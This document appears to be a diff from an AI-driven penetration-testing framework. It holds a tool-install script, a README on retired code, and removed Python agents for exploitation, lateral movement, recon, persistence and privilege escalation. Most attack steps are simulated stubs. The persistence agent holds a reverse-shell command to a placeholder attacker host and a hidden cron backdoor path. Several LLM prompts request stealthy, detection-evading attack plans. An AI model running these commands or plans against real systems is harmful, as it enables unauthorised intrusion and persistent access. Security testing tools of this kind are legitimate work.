return 0
fi
echo -e " ${YELLOW}[~]${NC} Installing SecLists..."
sudo mkdir -p /opt/wordlists
sudo git clone --depth 1 https://github.com/danielmiessler/SecLists.git "$SECLISTS_PATH" 2>/dev/null || {
echo -e " ${RED}[✗]${NC} SecLists installation failed"
return 1
}
# Create symlinks for common wordlists
sudo ln -sf "$SECLISTS_PATH/Discovery/Web-Content/common.txt" /opt/wordlists/common.txt 2>/dev/null
sudo ln -sf "$SECLISTS_PATH/Discovery/Web-Content/raft-medium-directories.txt" /opt/wordlists/directories.txt 2>/dev/null
sudo ln -sf "$SECLISTS_PATH/Discovery/DNS/subdomains-top1million-5000.txt" /opt/wordlists/subdomains.txt 2>/dev/null
echo -e " ${GREEN}[✓]${NC} SecLists installed"
}
# Install additional tools via package managers or manual
install_additional_tools() {
echo -e "\n${BLUE}[*] Installing additional tools...${NC}"
# wafw00f
if ! command_exists wafw00f; then
echo -e " ${YELLOW}[~]${NC} Installing wafw00f..."
pip3 install wafw00f 2>/dev/null || pip install wafw00f 2>/dev/null
fi
print_status "wafw00f"
# paramspider
if ! command_exists paramspider; then
echo -e " ${YELLOW}[~]${NC} Installing paramspider..."
pip3 install paramspider 2>/dev/null || {
git clone https://github.com/devanshbatham/ParamSpider.git /tmp/paramspider 2>/dev/null
cd /tmp/paramspider && pip3 install . 2>/dev/null
cd -
}
fi
print_status "paramspider"
# whatweb
if ! command_exists whatweb; then
if [ "$OS" == "macos" ]; then
brew install whatweb 2>/dev/null
elif [ "$OS" == "debian" ]; then
sudo apt install -y whatweb 2>/dev/null
fi
fi
print_status "whatweb"
# nikto
if ! command_exists nikto; then
if [ "$OS" == "macos" ]; then
brew install nikto 2>/dev/null
elif [ "$OS" == "debian" ]; then
sudo apt install -y nikto 2>/dev/null
fi
fi
print_status "nikto"
# sqlmap
if ! command_exists sqlmap; then
echo -e " ${YELLOW}[~]${NC} Installing sqlmap..."
if [ "$OS" == "macos" ]; then
brew install sqlmap 2>/dev/null
elif [ "$OS" == "debian" ]; then
sudo apt install -y sqlmap 2>/dev/null
else
pip3 install sqlmap 2>/dev/null
fi
fi
print_status "sqlmap"
# eyewitness
if ! command_exists eyewitness; then
echo -e " ${YELLOW}[~]${NC} Installing EyeWitness..."
git clone https://github.com/RedSiege/EyeWitness.git /opt/EyeWitness 2>/dev/null || true
if [ -d "/opt/EyeWitness" ]; then
cd /opt/EyeWitness/Python/setup
sudo ./setup.sh 2>/dev/null || true
sudo ln -sf /opt/EyeWitness/Python/EyeWitness.py /usr/local/bin/eyewitness 2>/dev/null
cd -
fi
fi
print_status "eyewitness"
# wpscan
if ! command_exists wpscan; then
echo -e " ${YELLOW}[~]${NC} Installing wpscan..."
if [ "$OS" == "macos" ]; then
brew install wpscan 2>/dev/null
else
sudo gem install wpscan 2>/dev/null || true
fi
fi
print_status "wpscan"
# dirsearch
if ! command_exists dirsearch; then
echo -e " ${YELLOW}[~]${NC} Installing dirsearch..."
pip3 install dirsearch 2>/dev/null || {
git clone https://github.com/maurosoria/dirsearch.git /opt/dirsearch 2>/dev/null
sudo ln -sf /opt/dirsearch/dirsearch.py /usr/local/bin/dirsearch 2>/dev/null
}
fi
print_status "dirsearch"
# massdns (for shuffledns/puredns)
if ! command_exists massdns; then
echo -e " ${YELLOW}[~]${NC} Installing massdns..."
git clone https://github.com/blechschmidt/massdns.git /tmp/massdns 2>/dev/null
cd /tmp/massdns && make 2>/dev/null && sudo make install 2>/dev/null
cd -
fi
print_status "massdns"
# puredns
if ! command_exists puredns; then
echo -e " ${YELLOW}[~]${NC} Installing puredns..."
go install github.com/d3mondev/puredns/v2@latest 2>/dev/null
fi
print_status "puredns"
# waymore
if ! command_exists waymore; then
echo -e " ${YELLOW}[~]${NC} Installing waymore..."
pip3 install waymore 2>/dev/null || pip install waymore 2>/dev/null
fi
print_status "waymore"
}
# Check all tools status
check_tools_status() {
echo -e "\n${CYAN}═══════════════════════════════════════════════════════════════${NC}"
echo -e "${CYAN} TOOLS STATUS SUMMARY ${NC}"
echo -e "${CYAN}═══════════════════════════════════════════════════════════════${NC}\n"
echo -e "${BLUE}[Subdomain Enumeration]${NC}"
print_status "subfinder"
print_status "amass"
print_status "assetfinder"
print_status "findomain"
print_status "puredns"
print_status "shuffledns"
print_status "massdns"
echo -e "\n${BLUE}[HTTP Probing]${NC}"
print_status "httpx"
print_status "httprobe"
echo -e "\n${BLUE}[URL Collection]${NC}"
print_status "gau"
print_status "waybackurls"
print_status "waymore"
print_status "hakrawler"
echo -e "\n${BLUE}[Web Crawling]${NC}"
print_status "katana"
print_status "gospider"
echo -e "\n${BLUE}[Directory Bruteforce]${NC}"
print_status "feroxbuster"
print_status "gobuster"
print_status "ffuf"
print_status "dirsearch"
echo -e "\n${BLUE}[Port Scanning]${NC}"
print_status "rustscan"
print_status "naabu"
print_status "nmap"
echo -e "\n${BLUE}[Vulnerability Scanning]${NC}"
print_status "nuclei"
print_status "nikto"
print_status "sqlmap"
print_status "wpscan"
echo -e "\n${BLUE}[WAF Detection]${NC}"
print_status "wafw00f"
echo -e "\n${BLUE}[Parameter Discovery]${NC}"
print_status "paramspider"
echo -e "\n${BLUE}[Fingerprinting]${NC}"
print_status "whatweb"
echo -e "\n${BLUE}[Screenshot]${NC}"
print_status "gowitness"
print_status "eyewitness"
echo -e "\n${BLUE}[Subdomain Takeover]${NC}"
print_status "subjack"
echo -e "\n${BLUE}[DNS Tools]${NC}"
print_status "dnsx"
print_status "dig"
echo -e "\n${BLUE}[Utilities]${NC}"
print_status "curl"
print_status "wget"
print_status "jq"
print_status "git"
echo -e "\n${BLUE}[Wordlists]${NC}"
if [ -d "/opt/wordlists/SecLists" ]; then
echo -e " ${GREEN}[✓]${NC} SecLists - installed at /opt/wordlists/SecLists"
else
echo -e " ${RED}[✗]${NC} SecLists - not found"
fi
}
# Update PATH
update_path() {
echo -e "\n${BLUE}[*] Updating PATH...${NC}"
# Add Go bin to PATH
if ! grep -q 'GOPATH' ~/.bashrc 2>/dev/null; then
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
fi
if ! grep -q 'GOPATH' ~/.zshrc 2>/dev/null; then
echo 'export GOPATH=$HOME/go' >> ~/.zshrc 2>/dev/null || true
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.zshrc 2>/dev/null || true
fi
# Add Cargo bin to PATH
if ! grep -q '.cargo/bin' ~/.bashrc 2>/dev/null; then
echo 'export PATH=$PATH:$HOME/.cargo/bin' >> ~/.bashrc
fi
# Source for current session
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin:$HOME/.cargo/bin
echo -e " ${GREEN}[✓]${NC} PATH updated"
}
# Main installation function
main() {
echo -e "${BLUE}[*] Starting NeuroSploit tools installation...${NC}\n"
detect_os
# Parse arguments
INSTALL_ALL=false
CHECK_ONLY=false
while [[ "$#" -gt 0 ]]; do
case $1 in
--all) INSTALL_ALL=true ;;
--check) CHECK_ONLY=true ;;
--help|-h)
echo "Usage: $0 [OPTIONS]"
echo ""
echo "Options:"
echo " --all Install all tools (full installation)"
echo " --check Only check tool status, don't install"
echo " --help Show this help message"
echo ""
exit 0
;;
*) echo "Unknown parameter: $1"; exit 1 ;;
esac
shift
done
if [ "$CHECK_ONLY" = true ]; then
check_tools_status
exit 0
fi
# Installation steps
install_system_packages
install_go
install_rust
install_python_packages
install_go_tools
install_rust_tools
install_additional_tools
install_seclists
install_nuclei_templates
update_path
# Final status check
check_tools_status
echo -e "\n${GREEN}═══════════════════════════════════════════════════════════════${NC}"
echo -e "${GREEN} INSTALLATION COMPLETE! ${NC}"
echo -e "${GREEN}═══════════════════════════════════════════════════════════════${NC}"
echo -e "\n${YELLOW}[!] Please restart your terminal or run: source ~/.bashrc${NC}"
echo -e "${YELLOW}[!] Some tools may require sudo privileges to run${NC}\n"
}
# Run main
main "$@"
-84
View File
File diff suppressed because one or more lines are too long
-29
View File
@@ -1,29 +0,0 @@
# Legacy (pre-v3.3.0) Python orchestration
These files are the **previous** orchestration architecture, retired in
NeuroSploit v3.3.0 when the pentest agent was re-modeled into an autonomous,
markdown-driven engine that delegates execution to a local agentic CLI backend.
Kept for reference and migration only — **not** used by the v3.3.0 engine.
| Path | What it was |
|------|-------------|
| `neurosploit_legacy.py` | The 2,500-line monolithic CLI/orchestrator (`NeuroSploitv2`) |
| `agents_python/` | Hand-coded Python agent classes (web/exploitation/lateral/privesc/persistence/recon) |
| `custom_agents/` | Example custom Python agent |
| `core/` | Old orchestration support (llm_manager, sandbox, report_generator, …) |
| `backend_fastapi/` | Old FastAPI backend — replaced by `webgui/server.py` (stdlib) |
| `frontend_react/` | Old React/Vite dashboard — replaced by the minimalist `webgui/` |
| `test_agent_run.py` | Test harness for the old Python agents |
## What replaced it
- **`neurosploit` + `neurosploit_agent/`** — the lean autonomous engine
(`orchestrator`, `agent_loader`, `backends`, `rl`, `mcp`, `models`, `cli`).
- **`agents_md/`** — 213 curated markdown agents (196 vuln specialists + 17
meta-agents) that the engine composes into a master prompt.
- The engine runs **Claude Code / Codex / Grok CLI** (or a Claude subscription)
as the autonomous runtime, with **Playwright MCP** for browser-based proof and
a **reinforcement-learning** loop that adapts agent selection across runs.
Run `./neurosploit` (interactive) or `./neurosploit run <url>` to use the new engine.
View File
File diff suppressed because it is too large Load Diff
-256
View File
@@ -1,256 +0,0 @@
#!/usr/bin/env python3
"""
Exploitation Agent - Vulnerability exploitation and access gaining
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.exploitation import (
ExploitDatabase,
MetasploitWrapper,
WebExploiter,
SQLInjector,
RCEExploiter,
BufferOverflowExploiter
)
logger = logging.getLogger(__name__)
class ExploitationAgent:
"""Agent responsible for vulnerability exploitation"""
def __init__(self, config: Dict):
"""Initialize exploitation agent"""
self.config = config
self.llm = LLMManager(config)
self.exploit_db = ExploitDatabase(config)
self.metasploit = MetasploitWrapper(config)
self.web_exploiter = WebExploiter(config)
self.sql_injector = SQLInjector(config)
self.rce_exploiter = RCEExploiter(config)
self.bof_exploiter = BufferOverflowExploiter(config)
logger.info("ExploitationAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute exploitation phase"""
logger.info(f"Starting exploitation on {target}")
results = {
"target": target,
"status": "running",
"successful_exploits": [],
"failed_attempts": [],
"shells_obtained": [],
"credentials_found": [],
"ai_recommendations": {}
}
try:
# Get reconnaissance data from context
recon_data = context.get("phases", {}).get("recon", {})
# Phase 1: Vulnerability Analysis
logger.info("Phase 1: Analyzing vulnerabilities")
vulnerabilities = self._identify_vulnerabilities(recon_data)
# Phase 2: AI-powered Exploit Selection
logger.info("Phase 2: AI exploit selection")
exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
results["ai_recommendations"] = exploit_plan
# Phase 3: Execute Exploits
logger.info("Phase 3: Executing exploits")
for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities
exploit_result = self._attempt_exploitation(vuln, target)
if exploit_result.get("success"):
results["successful_exploits"].append(exploit_result)
logger.info(f"Successful exploit: {vuln.get('type')}")
# Check for shell access
if exploit_result.get("shell_access"):
results["shells_obtained"].append(exploit_result["shell_info"])
else:
results["failed_attempts"].append(exploit_result)
# Phase 4: Post-Exploitation Intelligence
if results["successful_exploits"]:
logger.info("Phase 4: Post-exploitation intelligence gathering")
results["post_exploit_intel"] = self._gather_post_exploit_intel(
results["successful_exploits"]
)
results["status"] = "completed"
logger.info("Exploitation phase completed")
except Exception as e:
logger.error(f"Error during exploitation: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
"""Identify exploitable vulnerabilities from recon data"""
vulnerabilities = []
# Check network scan results
network_scan = recon_data.get("network_scan", {})
for host, data in network_scan.get("hosts", {}).items():
for port in data.get("open_ports", []):
vuln = {
"type": "network_service",
"host": host,
"port": port.get("port"),
"service": port.get("service"),
"version": port.get("version")
}
vulnerabilities.append(vuln)
# Check web vulnerabilities
web_analysis = recon_data.get("web_analysis", {})
for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
if web_analysis.get(vuln_type):
vulnerabilities.append({
"type": vuln_type,
"details": web_analysis[vuln_type]
})
return vulnerabilities
def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
"""Use AI to plan exploitation strategy"""
prompt = self.llm.get_prompt(
"exploitation",
"ai_exploit_planning_user",
default=f"""
Plan an exploitation strategy based on the following data:
Vulnerabilities Identified:
{json.dumps(vulnerabilities, indent=2)}
Reconnaissance Data:
{json.dumps(recon_data, indent=2)}
Provide:
1. Prioritized exploitation order
2. Recommended exploits for each vulnerability
3. Payload suggestions
4. Evasion techniques
5. Fallback strategies
6. Success probability estimates
Response in JSON format with detailed exploitation roadmap.
"""
)
system_prompt = self.llm.get_prompt(
"exploitation",
"ai_exploit_planning_system",
default="""You are an expert exploit developer and penetration tester.
Create sophisticated exploitation plans considering detection, success rates, and impact.
Prioritize stealthy, reliable exploits over noisy attempts."""
)
try:
formatted_prompt = prompt.format(
vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
recon_data_json=json.dumps(recon_data, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI exploit planning error: {e}")
return {"error": str(e)}
def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
"""Attempt to exploit a specific vulnerability"""
vuln_type = vulnerability.get("type")
result = {
"vulnerability": vulnerability,
"success": False,
"method": None,
"details": {}
}
try:
if vuln_type == "sql_injection":
result = self.sql_injector.exploit(target, vulnerability)
elif vuln_type in ["xss", "csrf"]:
result = self.web_exploiter.exploit(target, vulnerability)
elif vuln_type in ["rce", "command_injection"]:
result = self.rce_exploiter.exploit(target, vulnerability)
elif vuln_type == "buffer_overflow":
result = self.bof_exploiter.exploit(target, vulnerability)
elif vuln_type == "network_service":
result = self._exploit_network_service(target, vulnerability)
else:
# Use Metasploit for generic exploitation
result = self.metasploit.exploit(target, vulnerability)
except Exception as e:
logger.error(f"Exploitation error for {vuln_type}: {e}")
result["error"] = str(e)
return result
def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit network service vulnerabilities"""
service = vulnerability.get("service", "").lower()
# Check exploit database for known exploits
exploits = self.exploit_db.search(service, vulnerability.get("version"))
if exploits:
logger.info(f"Found {len(exploits)} exploits for {service}")
for exploit in exploits[:3]: # Try top 3 exploits
result = self.metasploit.run_exploit(
exploit["module"],
target,
vulnerability.get("port")
)
if result.get("success"):
return result
return {"success": False, "message": "No suitable exploits found"}
def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
"""Gather intelligence after successful exploitation"""
intel = {
"system_info": [],
"user_accounts": [],
"network_info": [],
"installed_software": [],
"credentials": []
}
for exploit in successful_exploits:
if exploit.get("shell_access"):
shell = exploit["shell_info"]
# Gather system information
# This would execute actual commands on compromised system
# Placeholder for demonstration
intel["system_info"].append({
"os": "detected_os",
"hostname": "detected_hostname",
"architecture": "x64"
})
return intel
def generate_custom_exploit(self, vulnerability: Dict) -> str:
"""Generate custom exploit using AI"""
target_info = {
"vulnerability": vulnerability,
"requirements": "Create working exploit code"
}
return self.llm.generate_payload(target_info, vulnerability.get("type"))
-199
View File
@@ -1,199 +0,0 @@
#!/usr/bin/env python3
"""
Lateral Movement Agent - Move through the network
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class LateralMovementAgent:
"""Agent responsible for lateral movement"""
def __init__(self, config: Dict):
"""Initialize lateral movement agent"""
self.config = config
self.llm = LLMManager(config)
logger.info("LateralMovementAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute lateral movement phase"""
logger.info(f"Starting lateral movement from {target}")
results = {
"target": target,
"status": "running",
"discovered_hosts": [],
"compromised_hosts": [],
"credentials_used": [],
"movement_paths": [],
"ai_analysis": {}
}
try:
# Get previous phase data
recon_data = context.get("phases", {}).get("recon", {})
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
# Phase 1: Network Discovery
logger.info("Phase 1: Internal network discovery")
results["discovered_hosts"] = self._discover_internal_network(recon_data)
# Phase 2: AI-Powered Movement Strategy
logger.info("Phase 2: AI lateral movement strategy")
strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
results["ai_analysis"] = strategy
# Phase 3: Credential Reuse
logger.info("Phase 3: Credential reuse attacks")
credentials = privesc_data.get("credentials_harvested", [])
results["credentials_used"] = self._attempt_credential_reuse(
results["discovered_hosts"],
credentials
)
# Phase 4: Pass-the-Hash/Pass-the-Ticket
logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
results["movement_paths"].extend(
self._pass_the_hash_attacks(results["discovered_hosts"])
)
# Phase 5: Exploit Trust Relationships
logger.info("Phase 5: Exploiting trust relationships")
results["movement_paths"].extend(
self._exploit_trust_relationships(results["discovered_hosts"])
)
results["status"] = "completed"
logger.info("Lateral movement phase completed")
except Exception as e:
logger.error(f"Error during lateral movement: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
"""Discover internal network hosts"""
hosts = []
# Extract hosts from recon data
network_scan = recon_data.get("network_scan", {})
for ip, data in network_scan.get("hosts", {}).items():
hosts.append({
"ip": ip,
"ports": data.get("open_ports", []),
"os": data.get("os", "unknown")
})
# Simulate additional internal discovery
hosts.extend([
{"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
{"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
{"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
])
return hosts
def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
"""Use AI to plan lateral movement"""
prompt = self.llm.get_prompt(
"lateral_movement",
"ai_movement_strategy_user",
default=f"""
Plan a lateral movement strategy based on the following:
Current Context:
{json.dumps(context, indent=2)}
Discovered Hosts:
{json.dumps(hosts, indent=2)}
Provide:
1. Target prioritization (high-value targets first)
2. Movement techniques for each target
3. Credential strategies
4. Evasion techniques
5. Attack path optimization
6. Fallback options
Response in JSON format with detailed attack paths.
"""
)
system_prompt = self.llm.get_prompt(
"lateral_movement",
"ai_movement_strategy_system",
default="""You are an expert in lateral movement and Active Directory attacks.
Plan sophisticated movement strategies that minimize detection and maximize impact.
Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
Prioritize domain controllers and critical infrastructure."""
)
try:
formatted_prompt = prompt.format(
context_json=json.dumps(context, indent=2),
hosts_json=json.dumps(hosts, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI movement strategy error: {e}")
return {"error": str(e)}
def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
"""Attempt credential reuse across hosts"""
attempts = []
for host in hosts[:5]: # Limit attempts
for cred in credentials[:3]:
attempts.append({
"host": host.get("ip"),
"credential": "***hidden***",
"protocol": "SMB",
"success": False, # Simulated
"status": "simulated"
})
return attempts
def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
"""Perform Pass-the-Hash attacks"""
attacks = []
for host in hosts:
if host.get("role") in ["domain_controller", "file_server"]:
attacks.append({
"type": "pass_the_hash",
"target": host.get("ip"),
"technique": "SMB relay",
"success": False, # Simulated
"status": "simulated"
})
return attacks
def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
"""Exploit trust relationships"""
exploits = []
# Domain trust exploitation
exploits.append({
"type": "domain_trust",
"description": "Cross-domain exploitation",
"status": "simulated"
})
# Kerberos delegation
exploits.append({
"type": "kerberos_delegation",
"description": "Unconstrained delegation abuse",
"status": "simulated"
})
return exploits
-148
View File
@@ -1,148 +0,0 @@
#!/usr/bin/env python3
"""
Network Reconnaissance Agent - Network-focused information gathering and enumeration
"""
import os
import json
import subprocess
from typing import Dict, List
import logging
from core.llm_manager import LLMManager
from tools.recon import (
NetworkScanner,
OSINTCollector,
DNSEnumerator,
SubdomainFinder
)
from urllib.parse import urlparse # Added import
logger = logging.getLogger(__name__)
class NetworkReconAgent:
"""Agent responsible for network-focused reconnaissance and information gathering"""
def __init__(self, config: Dict):
"""Initialize network reconnaissance agent"""
self.config = config
self.llm = LLMManager(config)
self.network_scanner = NetworkScanner(config)
self.osint = OSINTCollector(config)
self.dns_enum = DNSEnumerator(config)
self.subdomain_finder = SubdomainFinder(config)
logger.info("NetworkReconAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute network reconnaissance phase"""
logger.info(f"Starting network reconnaissance on {target}")
results = {
"target": target,
"status": "running",
"findings": [],
"network_scan": {},
"osint": {},
"dns": {},
"subdomains": [],
"ai_analysis": {}
}
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target
logger.info(f"Target for network tools: {target_host}")
try:
# Phase 1: Network Scanning
logger.info("Phase 1: Network scanning")
results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host
# Phase 2: DNS Enumeration
logger.info("Phase 2: DNS enumeration")
results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host
# Phase 3: Subdomain Discovery
logger.info("Phase 3: Subdomain discovery")
results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host
# Phase 4: OSINT Collection
logger.info("Phase 4: OSINT collection")
results["osint"] = self.osint.collect(target_host) # Use target_host
# Phase 5: AI Analysis
logger.info("Phase 5: AI-powered analysis")
results["ai_analysis"] = self._ai_analysis(results)
results["status"] = "completed"
logger.info("Network reconnaissance phase completed")
except Exception as e:
logger.error(f"Error during network reconnaissance: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _ai_analysis(self, recon_data: Dict) -> Dict:
"""Use AI to analyze reconnaissance data"""
prompt = self.llm.get_prompt(
"network_recon",
"ai_analysis_user",
default=f"""
Analyze the following network reconnaissance data and provide insights:
{json.dumps(recon_data, indent=2)}
Provide:
1. Attack surface summary
2. Prioritized network target list
3. Identified network vulnerabilities or misconfigurations
4. Recommended next steps for network exploitation
5. Network risk assessment
6. Stealth considerations for network activities
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"network_recon",
"ai_analysis_system",
default="""You are an expert network penetration tester analyzing reconnaissance data.
Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
Consider both technical and operational security aspects."""
)
try:
# Format the user prompt with recon_data
formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI analysis error: {e}")
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
def passive_recon(self, target: str) -> Dict:
"""Perform passive reconnaissance only"""
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target
return {
"osint": self.osint.collect(target_host), # Use target_host
"dns": self.dns_enum.enumerate(target_host), # Use target_host
"subdomains": self.subdomain_finder.find(target_host) # Use target_host
}
def active_recon(self, target: str) -> Dict:
"""Perform active reconnaissance"""
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target
return {
"network_scan": self.network_scanner.scan(target_host) # Use target_host
}
-250
View File
@@ -1,250 +0,0 @@
#!/usr/bin/env python3
"""
Persistence Agent - Maintain access to compromised systems
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class PersistenceAgent:
"""Agent responsible for maintaining access"""
def __init__(self, config: Dict):
"""Initialize persistence agent"""
self.config = config
self.llm = LLMManager(config)
logger.info("PersistenceAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute persistence phase"""
logger.info(f"Starting persistence establishment on {target}")
results = {
"target": target,
"status": "running",
"persistence_mechanisms": [],
"backdoors_installed": [],
"scheduled_tasks": [],
"ai_recommendations": {}
}
try:
# Get previous phase data
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
if not privesc_data.get("successful_escalations"):
logger.warning("No privilege escalation achieved. Limited persistence options.")
results["status"] = "limited"
# Phase 1: AI-Powered Persistence Strategy
logger.info("Phase 1: AI persistence strategy")
strategy = self._ai_persistence_strategy(context)
results["ai_recommendations"] = strategy
# Phase 2: Establish Persistence Mechanisms
logger.info("Phase 2: Establishing persistence mechanisms")
system_info = privesc_data.get("system_info", {})
os_type = system_info.get("os", "unknown")
if os_type == "linux":
results["persistence_mechanisms"].extend(
self._establish_linux_persistence()
)
elif os_type == "windows":
results["persistence_mechanisms"].extend(
self._establish_windows_persistence()
)
# Phase 3: Install Backdoors
logger.info("Phase 3: Installing backdoors")
results["backdoors_installed"] = self._install_backdoors(os_type)
# Phase 4: Create Scheduled Tasks
logger.info("Phase 4: Creating scheduled tasks")
results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)
results["status"] = "completed"
logger.info("Persistence phase completed")
except Exception as e:
logger.error(f"Error during persistence: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _ai_persistence_strategy(self, context: Dict) -> Dict:
"""Use AI to plan persistence strategy"""
prompt = self.llm.get_prompt(
"persistence",
"ai_persistence_strategy_user",
default=f"""
Plan a comprehensive persistence strategy based on the following context:
{json.dumps(context, indent=2)}
Provide:
1. Recommended persistence techniques (prioritized)
2. Stealth considerations
3. Resilience against system reboots
4. Evasion of detection mechanisms
5. Multiple fallback mechanisms
6. Cleanup and removal procedures
Response in JSON format with detailed implementation plan.
"""
)
system_prompt = self.llm.get_prompt(
"persistence",
"ai_persistence_strategy_system",
default="""You are an expert in persistence techniques and advanced persistent threats.
Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
Consider both Windows and Linux environments.
Prioritize operational security and longevity."""
)
try:
formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI persistence strategy error: {e}")
return {"error": str(e)}
def _establish_linux_persistence(self) -> List[Dict]:
"""Establish Linux persistence mechanisms"""
mechanisms = []
# Cron job
mechanisms.append({
"type": "cron_job",
"description": "Scheduled task for persistence",
"command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
"status": "simulated"
})
# SSH key
mechanisms.append({
"type": "ssh_key",
"description": "Authorized keys persistence",
"location": "~/.ssh/authorized_keys",
"status": "simulated"
})
# Systemd service
mechanisms.append({
"type": "systemd_service",
"description": "Persistent system service",
"service_name": "system-update.service",
"status": "simulated"
})
# bashrc modification
mechanisms.append({
"type": "bashrc",
"description": "Shell initialization persistence",
"location": "~/.bashrc",
"status": "simulated"
})
return mechanisms
def _establish_windows_persistence(self) -> List[Dict]:
"""Establish Windows persistence mechanisms"""
mechanisms = []
# Registry Run key
mechanisms.append({
"type": "registry_run",
"description": "Registry autorun persistence",
"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"status": "simulated"
})
# Scheduled task
mechanisms.append({
"type": "scheduled_task",
"description": "Windows scheduled task",
"task_name": "WindowsUpdate",
"status": "simulated"
})
# WMI event subscription
mechanisms.append({
"type": "wmi_event",
"description": "WMI persistence",
"status": "simulated"
})
# Service installation
mechanisms.append({
"type": "service",
"description": "Windows service persistence",
"service_name": "WindowsSecurityUpdate",
"status": "simulated"
})
return mechanisms
def _install_backdoors(self, os_type: str) -> List[Dict]:
"""Install backdoors"""
backdoors = []
if os_type == "linux":
backdoors.extend([
{
"type": "reverse_shell",
"description": "Netcat reverse shell",
"command": "nc -e /bin/bash attacker_ip 4444",
"status": "simulated"
},
{
"type": "ssh_backdoor",
"description": "SSH backdoor on alternate port",
"port": 2222,
"status": "simulated"
}
])
elif os_type == "windows":
backdoors.extend([
{
"type": "powershell_backdoor",
"description": "PowerShell reverse shell",
"status": "simulated"
},
{
"type": "meterpreter",
"description": "Meterpreter payload",
"status": "simulated"
}
])
return backdoors
def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
"""Create scheduled tasks"""
tasks = []
if os_type == "linux":
tasks.append({
"type": "cron",
"schedule": "*/10 * * * *",
"command": "Callback beacon every 10 minutes",
"status": "simulated"
})
elif os_type == "windows":
tasks.append({
"type": "scheduled_task",
"schedule": "Daily at 2 AM",
"command": "Callback beacon",
"status": "simulated"
})
return tasks
-305
View File
@@ -1,305 +0,0 @@
#!/usr/bin/env python3
"""
Privilege Escalation Agent - System privilege elevation
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.privesc import (
LinuxPrivEsc,
WindowsPrivEsc,
KernelExploiter,
MisconfigFinder,
CredentialHarvester,
SudoExploiter
)
logger = logging.getLogger(__name__)
class PrivEscAgent:
"""Agent responsible for privilege escalation"""
def __init__(self, config: Dict):
"""Initialize privilege escalation agent"""
self.config = config
self.llm = LLMManager(config)
self.linux_privesc = LinuxPrivEsc(config)
self.windows_privesc = WindowsPrivEsc(config)
self.kernel_exploiter = KernelExploiter(config)
self.misconfig_finder = MisconfigFinder(config)
self.cred_harvester = CredentialHarvester(config)
self.sudo_exploiter = SudoExploiter(config)
logger.info("PrivEscAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute privilege escalation phase"""
logger.info(f"Starting privilege escalation on {target}")
results = {
"target": target,
"status": "running",
"escalation_paths": [],
"successful_escalations": [],
"credentials_harvested": [],
"system_info": {},
"ai_analysis": {}
}
try:
# Get exploitation data from context
exploit_data = context.get("phases", {}).get("exploitation", {})
if not exploit_data.get("successful_exploits"):
logger.warning("No successful exploits found. Limited privilege escalation options.")
results["status"] = "skipped"
results["message"] = "No initial access obtained"
return results
